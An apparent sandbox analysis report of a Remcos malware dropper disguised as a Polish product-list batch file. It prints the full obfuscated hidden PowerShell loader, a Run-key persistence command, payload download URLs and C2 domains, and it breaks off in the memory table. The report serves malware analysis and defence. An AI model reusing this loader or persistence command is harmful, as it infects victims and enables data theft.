Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Lista produkt#U00f3w POL56583753Sarchmentdoc.bat
|
ASCII text, with very long lines (6113), with no line terminators
|
initial sample
|
 |
|
|
C:\ProgramData\remcos\logs.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\json[1].json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b1pb3zbc.hsw.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wso0u252.5xe.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y01fdie1.yk0.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zv3nzu3e.qiv.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\bhv2369.tmp
|
Extensible storage user DataBase, version 0x620, checksum 0x4dae47c9, page size 32768, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\fdoktovrfxxseixhmgrhbttuogexale
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EECJL22KTQ8NVS6R3LXW.temp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Satisfiable.Ins
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
There are 4 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Lista produkt#U00f3w POL56583753Sarchmentdoc.bat" "
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -windowstyle hidden " <#Paremernes duplicature Udvejer Dataservicens Treasury Ostleress Uninterdicted #>;$Cryoscopy='Grusgrav';<#Dubbe
Bantustamme Nyvurderende Tripudiate Mitigated #>; function Dark($Misligholdelsers){If ($host.DebuggerEnabled) {$Differentieringens++;}$Sadomasochism=$Cariss+$Misligholdelsers.'Length'-$Differentieringens;
for( $Unacute27=4;$Unacute27 -lt $Sadomasochism;$Unacute27+=5){$Unaccommodable=$Unacute27;$Enforth+=$Misligholdelsers[$Unacute27];$Cutireaction='Blomstringstiderne';}$Enforth;}function
Nondeclaratively($Budcyklen){ . ($Dolomitternes) ($Budcyklen);}$Skrllede=Dark 'StaiMC clo eftzF stiRagelRi elStyra ogn/Thra
';$Stupiditetens=Dark 'KrypTSvenl PresU ne1 nde2unav ';$Unpliantness=' lus[MashNFldee My T Fal.AnthsD coehistrru dVS stIEngrCBefaeTilgPTortO
BogiSangNOpspTMa.iMNonfA awnNSkruASamlgLibeEZygoR lit]Vaga:Sovj:AlecSMyogECuphcP esUGennRDisci C aTSkjuy BasP iggRV.rgo Ga
tGonioCam.c.eclOTrevlSvrm= Ven$Net sEndeTconcu.seuptomaiRoveDGoveIFagkT UnmE TraTGastEFravn R.ms Unp ';$Skrllede+=Dark 'Regi5Majo.Mau.0
Opd Simo(Tip WTer iF lgnChrodBusho Priw .orsUnsh j,nsN MolTBuff Fora1Side0Fod ..ast0Ni n;Vilj AnfgW KreieftenMaka6Svir4Unpr;Str,
ParxLine6 Uns4.nde;beru beedrAfkavGoat:Gene1 Un 3Sang1 up.Miss0fo m) Mor AandGDiskeRee cturbkMorpo dta/Nive2 Res0Drop1slad0Skuf0Arch1K,nd0.dst1
Ri tetFAeroi ConrStofe ,lifEnteo ,dkxTreu/A,te1V ra3Cod 1 Hdr.Fo r0Etym ';$Signatarmagters=Dark ' reu FyrsBivoe PosRIle
- alASneaG WayeIsodN J mTGe e ';$beskftigelsesinteressen=Dark 'Hre hS petTraft nkp Ka,sLoai:Inex/ Co /DowneConivYn leUndesIntaeVerdc
TmrrCaroeOlivtPrin.M,timGou aCyl /LokaM,adeigarasRecefAutoo ylbrForlsL.rat,orpa Pina Po e.egil Slfs WifeKbenr RetnReckeRejs.
Autp,heesGroum,itr ';$Unacute27mpastoed=Dark 'Volu> Nyt ';$Dolomitternes=Dark 'archiConsEForbX Skr ';$nyhedsbureauernes='Forfatningsdomstol';$Cynography='\Satisfiable.Ins';Nondeclaratively
(Dark 'Hort$AmphgSyrilLa gOBo abVaa ASh nL Und:VellsFdsekTestiMassLBys.s We,mSterIStilsstokSHan eSt erGuld1reva8 Rov=Rumi$
FleeGiarNUnsuvCons: efeAT rbPMicrPH lkDSpriAAntiTForsAColi+Unfo$Ges.CFo.lYKam NSta OOp,jgFallR BriA .enpTrasHBarkyHyae ');Nondeclaratively
(Dark ' ,ns$LavtgMonsL VinoCharB c aaCatcL D,n:sc,pKSambl regAL ngR ympLSpriAPsy GImmotba.keHortSGdni= par$SavsbMicreDiscSBrackMel
FPyr TTilbI,oncGBe oe TimlEnchsBuckEBrneSExosIGaseN,aklTBlgee Ranr R,seChroSUnpesRek,e Eu NDise. DaySFolkpRedelIn biPuckTMed
(Rage$PicaUMetaNClamAUdstCPastuA teTAeroE kse2 er7Gt,eMLa,dp.tagAVaans ikoTBarbOPulsEUngrdSamf)Himm ');Nondeclaratively (Dark
$Unpliantness);$beskftigelsesinteressen=$Klarlagtes[0];$Kakar=(Dark 'tr.i$Tut g DenlR.adOVrdibCru aWordLs.de:.pkaGSkadROve,uOronnArkidEft
V edgOOpfaL.rendFdesE ,roN OmgsPutr= BedNSlamED mpW rad-vapooFeatB IntjP liEKa,scRemstHumi FodbS hiy Ad,SSurrTS.ioESkosmTils.
aefNOpbyEWhartLykk. RebW A.se AlbbCommcF rlLAn,eISla,ESam N PieTSeku ');Nondeclaratively ($Kakar);Nondeclaratively (Dark 'Brav$SummGSyger
buluVitan Xerd danvCangoStamlK utdSip eTurinKi ts Ov,.EmblH BeceNdtvaAr,mdFlleeKultrCitrs ek [Pape$ TroS LeeiFrkhg F,bnH,gba
P.ethypea Figr Rabm para njegByu,t ynkeInshr Stes Tab] Ken=Per,$m.noSMackkMe.irPh,rlNianl F.seSi ndFucae Bab ');$Spectatorial=Dark
'Rese$ArtoGAborr awcu R gnHaradt onvVr ioPro l Pu dBugbeDodgnBesesAske.Eb eDklago FonwOs enAfskludgaoThela TridForeFNonciWorklPri,eSp
j(Pr i$Gai b.ubieIntrs SockNicofLucitKnuriti,dgKapieKu slmta s ProeFeebs ForiPat.nRougtVurdeFlusrOvereKad sIndtsAforeTil,nFjen,Alkv$
LamN,agea F laBuzzdDemal StveAflerEks 1 Inh7Scr )Juma ';$Naadler17=$Skilsmisser18;Nondeclaratively (Dark ' ost$StudgUdgilFjerOPadlb.luma
Hi.L Tan:AngoNRompRCousLNo wsSalgtZo,eEStra=Nonf(Picct ,egePelisG nntKval-B unPKo mABlintBalaH Dis Dek$Te tN DecAMe aaPa
aDA.sal.yzye.orvr,nsv1Styr7 P,n)Thir ');while (!$Nrlste) {Nondeclaratively (Dark 'Mul $AnskgGruplDjvloAtt bT ana ruslAff :NormO
ycob FaljD,ffeTrowkBj.ntVilieSupetHome=Disc$ KumtTe drLideu Ande Amo ') ;Nondeclaratively $Spectatorial;Nondeclaratively (Dark
'Ani SOutktS gnaFlunRRepoTUnra-ZappsunfrLTeleeI,coeBiblpFu h Abes4Unse ');Nondeclaratively (Dark 'Indd$TgthG f slReupOGl,bbDecoA.lanLRe,u:AnhnnVarermimuL
ligsRe ytunfoEFraf= K b(Ca.otStvkEneursGar.tM rm-UskrpKetuAOxyttAlgohMajo Tvr$PoweNP.daaPre aGenndHenvlNarkEPe srMorm1Udsk7Wago)Skri
') ;Nondeclaratively (Dark ' ort$StangAcqul alaOWindbRetiaMi nLRep,: ChrEIlsotIntetInstAKon,r arrRU inESti,=With$Amo GbybeLBadeoUncabByggaMar
LAdum:eve,sFlleTAtr,o.inoRRagtMTorkAStopGMuleaTaylshundI F gn UntEFa tRBlges irc+ lea+Filo%inf $ ntK lvrLCordA Udmr SeallineaC
ntGVvemt M.leOstes Mon.BetrcV.jfoTreduF denPrejTCirk ') ;$beskftigelsesinteressen=$Klarlagtes[$Ettarre];}$Allergists=311693;$Tugtelsen16=29701;Nondeclaratively
(Dark 'Uncu$WombgTaliLMusiOAfstbOb uAInteL Bil:AnthkNeceOFiskm BamMNedkOAn ndBa oEParaR,egenP.lye FriSInse Sper=Fej TrimGCic,e
OveT tig-DiplCSprjOTovaNEleptFugleDetaNstaktmars D,ct$fantnI.teACapsaMetaDKamul,ulteSamar Wit1Swim7Erin ');Nondeclaratively
(Dark 'Iris$S,ndgAfdml cocoPer bci naFoldl Inf:ShufK BezuAffasOp kkFrice VotsPostl C.iaKustgInv s r=Meso Syne[Vi oS ney,ellsBadet
MiceAf.imJamb.MoraC DisoLgedn scuvTromeA lerSulftUn a]Cu i:Kain:FlavFBryorMnstoagnumInkaBProtaTransHamseSlag6 Spa4 PseS T.etGener
UniiLandn R ggLinj( cle$Ba cK ordoJubimTri mTrufoAabndNedbeSaltrSinanMarkeStils ar).yto ');Nondeclaratively (Dark 'vesi$GsteGblealRadio
Pe.B Ka,AIndblInf,:TusiAListg Mu,ESpumrEurojUnscO emir UnrDwanneBotaN Rev Dead=Hare ri [ askS MenYkodfsConct PoteO.acMZorn.
Reft KomEBo.gXFo etRefr.MassE ButNTidscD scoPrecd H.siP,rsNMallg,odh]Bet.: S,b:PrevA ntis PunCAfsviForfI Var.KamnGHalvEarchT
algSrednt Tr RSamnIF shNMoungM,cr(Kamp$FedtkStakuBrussMoniKTe pENonasDithLP piAHypeG Bel)Afho ');Nondeclaratively (Dark '
Udp$T nngA knLav so ,udBTan aRa gLSuff: FeatpseueEthyu ArbTTr toPlatN Auti Buez adlE Sko=yder$Sun a elGOp fe VejR NapJ KonOCobur
PyrdMa tePop N ,eo.Co,nsSullu acBM,kss T gt ayoRAmmiI erNMissGSove(resk$ThirA SabL PaelSkobeBrnerR stG onsiReams ThetFlaksSpid,Jamb$Fag
tP esU VenG FulTOmprE ProLS uiSSkanE HonNGeni1 Ans6Pava)Cab, ');Nondeclaratively $Teutonize;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Paremernes duplicature Udvejer Dataservicens Treasury Ostleress
Uninterdicted #>;$Cryoscopy='Grusgrav';<#Dubbe Bantustamme Nyvurderende Tripudiate Mitigated #>; function Dark($Misligholdelsers){If
($host.DebuggerEnabled) {$Differentieringens++;}$Sadomasochism=$Cariss+$Misligholdelsers.'Length'-$Differentieringens; for(
$Unacute27=4;$Unacute27 -lt $Sadomasochism;$Unacute27+=5){$Unaccommodable=$Unacute27;$Enforth+=$Misligholdelsers[$Unacute27];$Cutireaction='Blomstringstiderne';}$Enforth;}function
Nondeclaratively($Budcyklen){ . ($Dolomitternes) ($Budcyklen);}$Skrllede=Dark 'StaiMC clo eftzF stiRagelRi elStyra ogn/Thra
';$Stupiditetens=Dark 'KrypTSvenl PresU ne1 nde2unav ';$Unpliantness=' lus[MashNFldee My T Fal.AnthsD coehistrru dVS stIEngrCBefaeTilgPTortO
BogiSangNOpspTMa.iMNonfA awnNSkruASamlgLibeEZygoR lit]Vaga:Sovj:AlecSMyogECuphcP esUGennRDisci C aTSkjuy BasP iggRV.rgo Ga
tGonioCam.c.eclOTrevlSvrm= Ven$Net sEndeTconcu.seuptomaiRoveDGoveIFagkT UnmE TraTGastEFravn R.ms Unp ';$Skrllede+=Dark 'Regi5Majo.Mau.0
Opd Simo(Tip WTer iF lgnChrodBusho Priw .orsUnsh j,nsN MolTBuff Fora1Side0Fod ..ast0Ni n;Vilj AnfgW KreieftenMaka6Svir4Unpr;Str,
ParxLine6 Uns4.nde;beru beedrAfkavGoat:Gene1 Un 3Sang1 up.Miss0fo m) Mor AandGDiskeRee cturbkMorpo dta/Nive2 Res0Drop1slad0Skuf0Arch1K,nd0.dst1
Ri tetFAeroi ConrStofe ,lifEnteo ,dkxTreu/A,te1V ra3Cod 1 Hdr.Fo r0Etym ';$Signatarmagters=Dark ' reu FyrsBivoe PosRIle
- alASneaG WayeIsodN J mTGe e ';$beskftigelsesinteressen=Dark 'Hre hS petTraft nkp Ka,sLoai:Inex/ Co /DowneConivYn leUndesIntaeVerdc
TmrrCaroeOlivtPrin.M,timGou aCyl /LokaM,adeigarasRecefAutoo ylbrForlsL.rat,orpa Pina Po e.egil Slfs WifeKbenr RetnReckeRejs.
Autp,heesGroum,itr ';$Unacute27mpastoed=Dark 'Volu> Nyt ';$Dolomitternes=Dark 'archiConsEForbX Skr ';$nyhedsbureauernes='Forfatningsdomstol';$Cynography='\Satisfiable.Ins';Nondeclaratively
(Dark 'Hort$AmphgSyrilLa gOBo abVaa ASh nL Und:VellsFdsekTestiMassLBys.s We,mSterIStilsstokSHan eSt erGuld1reva8 Rov=Rumi$
FleeGiarNUnsuvCons: efeAT rbPMicrPH lkDSpriAAntiTForsAColi+Unfo$Ges.CFo.lYKam NSta OOp,jgFallR BriA .enpTrasHBarkyHyae ');Nondeclaratively
(Dark ' ,ns$LavtgMonsL VinoCharB c aaCatcL D,n:sc,pKSambl regAL ngR ympLSpriAPsy GImmotba.keHortSGdni= par$SavsbMicreDiscSBrackMel
FPyr TTilbI,oncGBe oe TimlEnchsBuckEBrneSExosIGaseN,aklTBlgee Ranr R,seChroSUnpesRek,e Eu NDise. DaySFolkpRedelIn biPuckTMed
(Rage$PicaUMetaNClamAUdstCPastuA teTAeroE kse2 er7Gt,eMLa,dp.tagAVaans ikoTBarbOPulsEUngrdSamf)Himm ');Nondeclaratively (Dark
$Unpliantness);$beskftigelsesinteressen=$Klarlagtes[0];$Kakar=(Dark 'tr.i$Tut g DenlR.adOVrdibCru aWordLs.de:.pkaGSkadROve,uOronnArkidEft
V edgOOpfaL.rendFdesE ,roN OmgsPutr= BedNSlamED mpW rad-vapooFeatB IntjP liEKa,scRemstHumi FodbS hiy Ad,SSurrTS.ioESkosmTils.
aefNOpbyEWhartLykk. RebW A.se AlbbCommcF rlLAn,eISla,ESam N PieTSeku ');Nondeclaratively ($Kakar);Nondeclaratively (Dark 'Brav$SummGSyger
buluVitan Xerd danvCangoStamlK utdSip eTurinKi ts Ov,.EmblH BeceNdtvaAr,mdFlleeKultrCitrs ek [Pape$ TroS LeeiFrkhg F,bnH,gba
P.ethypea Figr Rabm para njegByu,t ynkeInshr Stes Tab] Ken=Per,$m.noSMackkMe.irPh,rlNianl F.seSi ndFucae Bab ');$Spectatorial=Dark
'Rese$ArtoGAborr awcu R gnHaradt onvVr ioPro l Pu dBugbeDodgnBesesAske.Eb eDklago FonwOs enAfskludgaoThela TridForeFNonciWorklPri,eSp
j(Pr i$Gai b.ubieIntrs SockNicofLucitKnuriti,dgKapieKu slmta s ProeFeebs ForiPat.nRougtVurdeFlusrOvereKad sIndtsAforeTil,nFjen,Alkv$
LamN,agea F laBuzzdDemal StveAflerEks 1 Inh7Scr )Juma ';$Naadler17=$Skilsmisser18;Nondeclaratively (Dark ' ost$StudgUdgilFjerOPadlb.luma
Hi.L Tan:AngoNRompRCousLNo wsSalgtZo,eEStra=Nonf(Picct ,egePelisG nntKval-B unPKo mABlintBalaH Dis Dek$Te tN DecAMe aaPa
aDA.sal.yzye.orvr,nsv1Styr7 P,n)Thir ');while (!$Nrlste) {Nondeclaratively (Dark 'Mul $AnskgGruplDjvloAtt bT ana ruslAff :NormO
ycob FaljD,ffeTrowkBj.ntVilieSupetHome=Disc$ KumtTe drLideu Ande Amo ') ;Nondeclaratively $Spectatorial;Nondeclaratively (Dark
'Ani SOutktS gnaFlunRRepoTUnra-ZappsunfrLTeleeI,coeBiblpFu h Abes4Unse ');Nondeclaratively (Dark 'Indd$TgthG f slReupOGl,bbDecoA.lanLRe,u:AnhnnVarermimuL
ligsRe ytunfoEFraf= K b(Ca.otStvkEneursGar.tM rm-UskrpKetuAOxyttAlgohMajo Tvr$PoweNP.daaPre aGenndHenvlNarkEPe srMorm1Udsk7Wago)Skri
') ;Nondeclaratively (Dark ' ort$StangAcqul alaOWindbRetiaMi nLRep,: ChrEIlsotIntetInstAKon,r arrRU inESti,=With$Amo GbybeLBadeoUncabByggaMar
LAdum:eve,sFlleTAtr,o.inoRRagtMTorkAStopGMuleaTaylshundI F gn UntEFa tRBlges irc+ lea+Filo%inf $ ntK lvrLCordA Udmr SeallineaC
ntGVvemt M.leOstes Mon.BetrcV.jfoTreduF denPrejTCirk ') ;$beskftigelsesinteressen=$Klarlagtes[$Ettarre];}$Allergists=311693;$Tugtelsen16=29701;Nondeclaratively
(Dark 'Uncu$WombgTaliLMusiOAfstbOb uAInteL Bil:AnthkNeceOFiskm BamMNedkOAn ndBa oEParaR,egenP.lye FriSInse Sper=Fej TrimGCic,e
OveT tig-DiplCSprjOTovaNEleptFugleDetaNstaktmars D,ct$fantnI.teACapsaMetaDKamul,ulteSamar Wit1Swim7Erin ');Nondeclaratively
(Dark 'Iris$S,ndgAfdml cocoPer bci naFoldl Inf:ShufK BezuAffasOp kkFrice VotsPostl C.iaKustgInv s r=Meso Syne[Vi oS ney,ellsBadet
MiceAf.imJamb.MoraC DisoLgedn scuvTromeA lerSulftUn a]Cu i:Kain:FlavFBryorMnstoagnumInkaBProtaTransHamseSlag6 Spa4 PseS T.etGener
UniiLandn R ggLinj( cle$Ba cK ordoJubimTri mTrufoAabndNedbeSaltrSinanMarkeStils ar).yto ');Nondeclaratively (Dark 'vesi$GsteGblealRadio
Pe.B Ka,AIndblInf,:TusiAListg Mu,ESpumrEurojUnscO emir UnrDwanneBotaN Rev Dead=Hare ri [ askS MenYkodfsConct PoteO.acMZorn.
Reft KomEBo.gXFo etRefr.MassE ButNTidscD scoPrecd H.siP,rsNMallg,odh]Bet.: S,b:PrevA ntis PunCAfsviForfI Var.KamnGHalvEarchT
algSrednt Tr RSamnIF shNMoungM,cr(Kamp$FedtkStakuBrussMoniKTe pENonasDithLP piAHypeG Bel)Afho ');Nondeclaratively (Dark '
Udp$T nngA knLav so ,udBTan aRa gLSuff: FeatpseueEthyu ArbTTr toPlatN Auti Buez adlE Sko=yder$Sun a elGOp fe VejR NapJ KonOCobur
PyrdMa tePop N ,eo.Co,nsSullu acBM,kss T gt ayoRAmmiI erNMissGSove(resk$ThirA SabL PaelSkobeBrnerR stG onsiReams ThetFlaksSpid,Jamb$Fag
tP esU VenG FulTOmprE ProLS uiSSkanE HonNGeni1 Ans6Pava)Cab, ');Nondeclaratively $Teutonize;"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\SysWOW64\msiexec.exe"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fdoktovrfxxseixhmgrhbttuogexale"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fdoktovrfxxseixhmgrhbttuogexale"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fdoktovrfxxseixhmgrhbttuogexale"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fdoktovrfxxseixhmgrhbttuogexale"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qyucuggstgpeoollwrdamgokovwgtwvpgi"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\sahvvz"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udstiller35" /t REG_EXPAND_SZ
/d "%Atlantad% -windowstyle 1 $Dogship=(gp -Path 'HKCU:\Software\Badder\').Trigonocephaly;%Atlantad% ($Dogship)"
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udstiller35" /t REG_EXPAND_SZ /d "%Atlantad% -windowstyle
1 $Dogship=(gp -Path 'HKCU:\Software\Badder\').Trigonocephaly;%Atlantad% ($Dogship)"
|
There are 6 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://www.imvu.comr
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingth
|
unknown
|
||
|
http://geoplugin.net/json.gp)
|
unknown
|
||
|
https://plieltd.top/#n
|
unknown
|
||
|
http://geoplugin.net/json.gpeiX
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://plieltd.top/?n
|
unknown
|
||
|
http://www.nirsoft.net
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingaotak
|
unknown
|
||
|
https://deff.nelreports.net/api/report?cat=msn
|
unknown
|
||
|
https://evesecret.ma/Misforstaaelserne.psmXRdl
|
unknown
|
||
|
http://geoplugin.net/json.gp;
|
unknown
|
||
|
https://evesecret.ma/Misforstaaelserne.psmP
|
unknown
|
||
|
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
|
unknown
|
||
|
https://evesecret.ma/eYyaWC130.bin
|
37.230.62.86
|
||
|
https://www.google.com
|
unknown
|
||
|
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
|
unknown
|
||
|
http://evesecret.ma
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://evesecret.ma/Misforstaaelserne.psm
|
37.230.62.86
|
||
|
https://login.yahoo.com/config/login
|
unknown
|
||
|
http://www.nirsoft.net/
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&
|
unknown
|
||
|
https://www.office.com/
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
http://www.imvu.compData
|
unknown
|
||
|
http://geoplugin.net/json.gpj
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://plieltd.top/eYyaWC130.bin
|
104.21.56.189
|
||
|
https://evesecret.ma
|
unknown
|
||
|
http://geoplugin.net/json.gpo
|
unknown
|
||
|
http://www.imvu.com
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=wsb
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
|
unknown
|
||
|
http://geoplugin.net/json.gpy
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
|
https://plieltd.top/eYyaWC130.binEn
|
unknown
|
||
|
http://crl.micro
|
unknown
|
||
|
http://geoplugin.net/
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingaot
|
unknown
|
||
|
http://crl.mx
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingrms
|
unknown
|
||
|
https://www.google.com/accounts/servicelogin
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://www.ebuddy.com
|
unknown
|
There are 43 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
odinga.duckdns.org
|
143.244.46.150
|
|
|
|
updated212.duckdns.org
|
143.244.46.150
|
|
|
|
plieltd.top
|
104.21.56.189
|
||
|
geoplugin.net
|
178.237.33.50
|
||
|
evesecret.ma
|
37.230.62.86
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
143.244.46.150
|
odinga.duckdns.org
|
United States
|
|
|
|
104.21.56.189
|
plieltd.top
|
United States
|
||
|
37.230.62.86
|
evesecret.ma
|
United Kingdom
|
||
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Badder
|
Trigonocephaly
|
||
|
HKEY_CURRENT_USER\Environment
|
Atlantad
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-ASN50U
|
exepath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-ASN50U
|
licence
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-ASN50U
|
time
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Udstiller35
|
There are 10 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
88D4000
|
heap
|
page read and write
|
|
|
|
88D4000
|
heap
|
page read and write
|
|
|
|
8C20000
|
direct allocation
|
page execute and read and write
|
|
|
|
941D000
|
direct allocation
|
page execute and read and write
|
|
|
|
8883000
|
heap
|
page read and write
|
|
|
|
14F9006F000
|
trusted library allocation
|
page read and write
|
|
|
|
5E7A000
|
trusted library allocation
|
page read and write
|
|
|
|
8882000
|
heap
|
page read and write
|
|
|
|
41B000
|
system
|
page execute and read and write
|
||
|
2D9D000
|
stack
|
page read and write
|
||
|
7FFD3473C000
|
trusted library allocation
|
page execute and read and write
|
||
|
4BE1000
|
heap
|
page read and write
|
||
|
29B0000
|
heap
|
page readonly
|
||
|
51D1000
|
heap
|
page read and write
|
||
|
88E9000
|
heap
|
page read and write
|
||
|
88E6000
|
heap
|
page read and write
|
||
|
7320000
|
direct allocation
|
page read and write
|
||
|
14F804F7000
|
trusted library allocation
|
page read and write
|
||
|
8C0C000
|
stack
|
page read and write
|
||
|
14FF8C50000
|
trusted library allocation
|
page read and write
|
||
|
88E6000
|
heap
|
page read and write
|
||
|
4B5A000
|
trusted library allocation
|
page execute and read and write
|
||
|
14FF73E0000
|
heap
|
page read and write
|
||
|
14FF71EA000
|
heap
|
page read and write
|
||
|
14F8048C000
|
trusted library allocation
|
page read and write
|
||
|
2F75000
|
heap
|
page read and write
|
||
|
33A9000
|
heap
|
page read and write
|
||
|
51DB000
|
heap
|
page read and write
|
||
|
51EF000
|
heap
|
page read and write
|
||
|
78A4000
|
heap
|
page read and write
|
||
|
52CF000
|
stack
|
page read and write
|
||
|
14FF71E5000
